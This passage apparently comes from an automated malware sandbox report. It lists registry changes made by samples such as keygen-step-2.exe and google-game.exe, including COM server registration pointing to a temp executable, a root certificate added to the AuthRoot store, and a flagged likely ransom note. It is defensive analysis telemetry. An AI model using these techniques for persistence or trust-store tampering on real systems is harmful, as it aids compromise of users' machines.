Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" app.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" app.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exePING.EXErundll32.exegoogle-game.exesvchost.exeMicrosoftEdgeCP.exesvchost.exeE0C9.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000 Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\MRUListEx = ffffffff Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\MRUListEx = 00000000ffffffff Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "9" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = 00000000ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "74" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\LocalServer32 PING.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rub4hiz1.hxz\\GOOGLE~1.EXE" google-game.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}\1 = "7124" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0200000004000000030000000100000000000000ffffffff Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 413d0a152036d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1a2f8eff1f36d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 96b4d8042036d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "9" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000efe85a27f75fc26af9d63e8120de20b26784243f9b5d0c83f46dacd8e068358d16f40ec37cde148c5b7b7b8290f161dd7ea94209e1c31a25b895bb9e1f1e MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus E0C9.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0200000003000000040000000100000000000000ffffffff Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "142" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 -
Processes:
keygen-step-2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
